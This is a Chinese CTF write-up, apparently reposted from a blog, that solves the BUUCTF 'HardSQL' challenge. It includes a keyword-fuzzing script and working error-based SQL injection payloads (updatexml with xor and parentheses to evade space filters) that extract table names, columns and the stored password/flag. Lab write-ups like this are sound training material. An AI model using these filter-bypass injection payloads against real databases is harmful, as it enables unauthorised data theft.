标签：buuctf url HardSQL 空格 2019 updatexml line password concat

时间：August 8 2022

经过测试发现

• 闭合用单引号
• 过滤了空格等字符和sql关键词，用%20、%0a、/**/来绕过都不行

fuzzing一下，看有哪些关键词和字符被过滤了：

import requests

with open('Sql.txt') as f:
    for line in f:
        line = line.replace('\n','')
        url = f'http://4eaf0972-f579-469d-8467-d2188d04562a.node4.buuoj.cn:81/check.php?username={line}&password=a'
        r = requests.get(url=url)
        if "臭弟弟" in r.text and r.status_code == 200:
            print(line,'、',end='')

如果无法绕过空格的话，无法执行sql。实际上除了以上绕过空格的方法，还可以用逻辑运算符(与、或、异或)结合括号()来实现绕过空格

经测试，过滤了与运算符(and、&&)，还有竖线|
没有过滤或(or)和异或运算符(xor、^)

在开始注入之前要注意下，提交数据是通过form表单的get方式，该方式会对数据进行url编码，例如

• 输入 %23 --> 实际结果：%25%23
• 输入 %20 --> 实际结果：%25%20

可以看出，这里的url编码和在浏览器的url框中的输入还是有区别的。浏览器的url框更加智能一些。

使用报错注入：updatexml()

表名

将下面的恶意语句在表单的用户名或密码处输入均可

a'^(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database()))),1))#

得到表名H4rDsq1
注意：所有需要用到空格的地方，可以通过括号进行包裹来绕过。

列名

a'^(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database()))),1))#

id,username,password

数据

a'xor(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))),1))#

这里flag显示不全，是因为updatexml的报错信息最多可以显示32位，我们可以用mysql的字符串函数，例如：substr()、substring()、mid()、right()、left()

a'xor(updatexml(1,concat(0x7e,(select(right(group_concat(password),31))from(H4rDsq1))),1))#

结合以上两张图片，去掉重复的部分即可得到flag

小结

过滤了空格，可以考虑使用()来代替

标签：buuctf,url,HardSQL,空格,2019,updatexml,line,password,concat
来源： https://www.cnblogs.com/baola/p/16562148.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。